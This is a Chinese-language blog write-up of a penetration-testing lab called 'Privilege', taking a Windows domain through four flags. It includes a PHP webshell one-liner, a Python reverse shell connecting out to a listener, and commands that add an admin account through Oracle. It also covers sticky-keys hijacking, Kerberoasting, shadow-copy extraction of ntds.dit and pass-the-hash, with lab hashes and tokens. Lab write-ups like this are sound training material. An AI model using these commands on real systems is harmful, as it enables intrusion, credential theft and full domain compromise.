flag01 源码泄露+JenKins命令执行

Pasted image 20260421114502
开着3389，是一台windows。首先有一个wordpress源码泄露

www/tools里面有一个文件包含，可以任意文件读：

<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file is exist.
if ( file_exists( $logfile ) ) {
  // Get the content and echo it.
  $text = file_get_contents( $logfile );
  echo( $text );
}
exit;

8080端口是jenkins的后台登录界面，题目提示打wordpress的文件读取去读密码
Pasted image 20260421114618

Pasted image 20260421135030
http://39.99.228.84/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword
一开始以为这个是密码的md5值，后来发现这个就是密码，直接可以登jenkins的后台
Pasted image 20260421135007

网上找了一下Jenkins的cve，发现这个地方是可以执行命令的：
Pasted image 20260421140355
写一句话木马：new File("C:\\phpstudy_pro\\WWW\\shell.php").write('<?php @eval($_POST[cmd]);?>');
上菜了：
Pasted image 20260421140727
还有一种方法，如果没有php站的情况下，可以wegt让他下载个python脚本，然后执行

println "python3 /tmp/ft.py".execute().text

#!/usr/bin/python
# This is a Python reverse shell script
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.241.128",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
[p=subprocess.call](https://link.zhihu.com/?target=http%3A//p%3Dsubprocess.call)(["/bin/sh","-i"]);

可以参考： https://zhuanlan.zhihu.com/p/718857178

flag02 gitlab api泄露+oracle

扫一下内网：

[2026-04-21 14:29:52] [SUCCESS] 目标 172.22.14.7     存活 (ICMP) 已拿下
[2026-04-21 14:29:52] [SUCCESS] 目标 172.22.14.11    存活 (ICMP)
[2026-04-21 14:29:52] [SUCCESS] 目标 172.22.14.16    存活 (ICMP)
[2026-04-21 14:29:53] [SUCCESS] 目标 172.22.14.31    存活 (ICMP)
[2026-04-21 14:29:53] [SUCCESS] 目标 172.22.14.46    存活 (ICMP)

[2026-04-21 14:31:21] [SUCCESS] NetBios 172.22.14.11    DC:XIAORANG\XR-DC          
[2026-04-21 14:31:21] [SUCCESS] NetBios 172.22.14.46    XIAORANG\XR-0923           
[2026-04-21 14:31:21] [SUCCESS] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE

[2026-04-21 14:31:19] [SUCCESS] 网站标题 http://172.22.14.46       状态码:200 长度:703    标题:IIS Windows Server
[2026-04-21 14:31:29] [SUCCESS] 网站标题 http://172.22.14.16/users/sign_in 状态码:200 长度:34961  标题:Sign in · GitLab

找到api token
Pasted image 20260421143415
Pasted image 20260421143347
这是被加密的，解密一下：
参考： https://www.cnblogs.com/zpchcbd/p/17573272.html
Pasted image 20260421143645

apiToken = "glpat-7kD_qLH2PiQv_ywB9hz2"

刚刚我们扫出来内网有一个自部署的gitlab，我们用这个apitoken连接一下，看看有什么仓库：

curl --header "PRIVATE-TOKEN: glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects?membership=true&simple=true&per_page=100"

Pasted image 20260421144851
整理一下：

http://gitlab.xiaorang.lab/xrlab/internal-secret.git
http://gitlab.xiaorang.lab/xrlab/xradmin.git
http://gitlab.xiaorang.lab/xrlab/awenode.git
http://gitlab.xiaorang.lab/xrlab/xrwiki.git

把internal-secret的内容都拉下来：

git clone http://172.22.14.16/xrlab/internal-secret.git

拿到密码，接下来尝试登录oracle
Pasted image 20260421151418

172.22.14.31 oracle 1521服务端口开着的
Pasted image 20260421151643

在这个ruoyi项目里面找到oracle的数据库密码
Pasted image 20260421154700
Pasted image 20260421154809

我直接用MDUT连接爆错了，读不了文件，估计java环境有点问题，看了一眼wp，可以用obat打，之前没用过这个工具：

proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user qwq Qq123456. /add'
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup Administrators qwq /add'

然后rdp即可
Pasted image 20260421160419

flag03 SeChangeNotifyPrivilege提权

oracle进来之后mimikatz并没有发现什么东西，刚刚拿到一个密码本，结合扫描结果：

[2026-04-21 14:31:21] [SUCCESS] NetBios 172.22.14.46    XIAORANG\XR-0923

对应的密码应该是，可以直接rdp上去

XR-0923 | zhangshuai | wSbEajHzZs

低权限，考虑提权，发现有这个权限：
Pasted image 20260421162413

SeBackup 和 SeRestore 权限允许用户读取和写入系统中的任何文件，而忽略任何现有的DACL。此权限背后的想法是允许某些用户从系统执行备份，而无需完全管理权限。有了这种能力，攻击者就可以使用多种技术轻松提升系统权限。

找到这篇文章，
Pasted image 20260421163349
把粘滞键劫持为cmd

proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe

锁屏界面用粘滞键变成cmd.exe，拿到system
Pasted image 20260421164029
Pasted image 20260421164200

flag04 Kerberoasting+卷影拷贝

拿到system之后mimikatz可以抓到机器账户的hash

Authentication Id : 0 ; 1124579 (00000000:001128e3)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2026/4/21 18:12:28
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 1d81fa60f2777660bd43cb7a315fb2f5
         * SHA1     : 270cbec35a86689290fe860d446e495ca27c4c72
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 72 e9 b6 69 38 73 54 62 e5 f6 d0 1d ea 31 54 8e c5 84 11 f8 8d ab e7 ce de 6f fb 94 25 af 1c 5a b1 3c 92 0a 28 9a 9d 01 01 d6 9a 45 56 ee ee f2 c1 17 cf 0b 1a 51 d9 f9 02 28 d2 de eb c4 f5 69 29 57 bc a3 2c c8 31 e7 a0 fe af 5c 45 cf 10 52 37 3f e0 37 c4 a8 01 86 57 d0 a2 8d 9a c4 2b 7d 57 83 96 87 88 5a 78 01 0b c2 dc d9 9f 2c a2 17 39 63 0b c9 8e 49 29 76 18 cc d6 0a 4c cd 83 f4 a7 1d 8c 11 bb 2c 94 aa 7e b1 e9 9b 13 22 46 69 37 92 66 a5 39 fb eb fa 1a 4c e5 10 8a fb 8c 71 b3 e4 30 4d 2d 9c 74 26 34 d1 11 67 29 62 68 68 08 e1 c9 19 25 e5 a8 03 a8 2d ee 92 2d d0 41 00 a7 2b 49 96 87 48 f1 3e bd c4 c5 f8 04 70 f2 bf 3c 20 a2 5f 06 83 b4 7f 51 a7 36 13 15 92 09 05 f7 8e 8c 10 01 41 fb c4 15 3d d1 61 f9 4c 5c bd
        ssp :
        credman :
        cloudap :

顺便收集一下域信息：C:\Users\zhangshuai\SharpHound.exe -r all，发现目前的这个zhangshuai是没法到DC的。

看一下SPN:
Pasted image 20260421181837
有一个tianjing账号，发现是可以到DC的：
Pasted image 20260421181918

抓一下TGS：

proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :1d81fa60f2777660bd43cb7a315fb2f5 -dc-ip 172.22.14.11 -request-user tianjing

$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$72990eda21d2b37bda43482a1aa4e0a0$e5f4e6aaf4db6f3115cbdd885780528eef45502b678602aa95b1bf72929f9b6ff35492950cca6f9d1b4f2092699d6bc24c5a28e27667280d7fd64cc46338104909acbb322c427d0fab3b15f074e202400eb506cb2cb6903cbb38c31fc050e99080a58565a43d2ae1f7d920933aebab7243ef3d2d3f96c2ee74953a3fd8ba7f862d24eac03c786b11f973962009cf5e8456d127b95226d6a301ecddb1ec3f59425155c29df40f7add61075a64f191325919c416b42d30cb0b642f2fd255266148b76ba54d0f752b78c6ba7d30246d93ca708d6dcabbbe1029a1c296b495942805d8fa5ad4bab9363ca104d45a5ebf3b88deec84d62bdbd242ebc39177e85dc23688830b355073aae9e6e4e56441c6687a669252f496795ded0957e7581844f3a44a6fa1e69ab439af5e8f427b4245706bf71e51a4d18682e969e952c807b95910f1e9c51d61bdbd01200b565e1acc6cf3d5f26afccd28261436502728a23b361690172ae0c84015c04ee0673e69cbde766882d98bb4a47506ea4d86059925c416d091310feb1e78ad3b90c1735c31a65d227b9498172fdae453798da81d5e728be879b4499a06a9a6edd46b2d67036b80ad0f3240e1c65738d59e5d46b1cadf78fa00cfc23883e56aa73e7f3fa28b31b7e31f82c2907c2d9eb67810f8d9d39ff88a290c6c6f376311094e6792393b71e98ac564f58f8c6a61c2cc2d0495e0c9d1038c32f6f11b4f44c274dfcadcd01e6f378292c66563fa9bbffa4dac7ef78d3c966ff4f2ca68a5584664644c26a95d4176bf22a4c4309b00c1899ae035709719564020d9bc364bf241d6fc26e35e1099a1e800c27b184022fb7c7062814eed55d4e9201322330157093bc85ff6107d87f8a1b28bbc527264e11273c3a4f8134b515b66c3e64b609a9152dfb7b4c7d169a73949150b8de16964a6540f9ac15945def8cd5875a63445d4b53ab588bbe20ca1f74c2e97f3cff8a410e1d370140b4160bd1e51d4fc7fb6547165c8c806cdbc01e6384ff5e549cee47ed40b369daba55590258529954f752747497d76c6ccd489bc0fae25942372a0a5eba925c1f8092ec737a2a14e45913d699ffff6bbc164046ce9b1f3ecdeacd1e90399cdbc322ded2f12b2fc6110c4f43760514e1df6cf80beeacb9df8c4b805e18c5e7003ad57e1e46c2d81b80e23adac73f51bf9b04761666dd3b867c8bceb0e4cdf6407734837d76de2d1895291528e9a783c070e766efb4ad8361185b418ced7f913df787986312098c5125bd0dbcbc40a681f113d28113af626de225a7345a7637ec8fb1f8e5c8c257f0bbac69a8cbdc8b6f1f962ededc765be2fc0e8d1a2408361238491f983e21234868e6607b80e515a9833640c8a9ba1e1647284bccbb67f873cf68f675ad3ce43a9aab48c1835736ad70f168ce01c5e0c3835281b6062d0e8364b14e01bb80b52aef8d4b47ad5ad7a8cb454b50636a65b

Pasted image 20260421182932
hashcat.exe -m 13100 hash.txt wordlists.txt
爆破即可：tianjing:DPQSXSXgh2

rdp登不上去
Pasted image 20260421183239

那我们用evil-winrm

proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2

发现有SeBackupPrivilege特权
Pasted image 20260421183338
Pasted image 20260421183518
还是要想办法导出域管的hash

找到篇文章 https://www.cnblogs.com/kqdssheng/p/18741609

思路是：使用卷影副本（Volume Shadow Copy Service, VSS）管理工具 diskshadow.exe 去创建系统盘（C盘）的卷影副本来提取 SAM/SYSTEM 文件的副本

我们先制作一个脚本：

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append echo "create" | out-file ./diskshadow.txt -encoding ascii -append echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append

可以看出作用就是给C盘创建一个副本并暴露在Z:
然后运行：

diskshadow.exe /s c:\temp\diskshadow.txt

Pasted image 20260421184244

那么接下来我们就可以在开机状态在导出ntds和SYSTEM文件，用robocopy命令把这两个文件拷贝到C:\temp，这里原文写的是SAM，但是域中用户信息是存在ntds.dit里面的，导出这个更好。

robocopy /b Z:\Windows\System32\config C:\temp SYSTEM 
RoboCopy /b z:\windows\ntds . ntds.dit

然后下载到本地：

*Evil-WinRM* PS C:\temp> download SYSTEM SYSTEM
*Evil-WinRM* PS C:\temp> download ntds.dit ntds

然后提取所有用户的hash即可：

impacket-secretsdump -ntds ntds.dit -system SYSTEM local

Pasted image 20260421191707

最后pth

#Administrator:500:aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277:::
proxychains crackmapexec smb 172.22.14.11 -u administrator -H :70c39b547b7d8adec35ad7c09fb1d277 -d xiaorang.lab -x "whoami"

Pasted image 20260421191931

文章作者： Xiaohao

文章链接： https://blog.enxiaohao.cn/posts/Pentration/PrivilegeWriteUp/

版权声明：除另有声明外，本博客文章均采用 CC BY-NC-SA 4.0 许可协议。转载请注明原作者与文章出处。

春秋云境 Privilege WriteUp

flag01 源码泄露+JenKins命令执行

flag02 gitlab api泄露+oracle

flag03 SeChangeNotifyPrivilege提权

flag04 Kerberoasting+卷影拷贝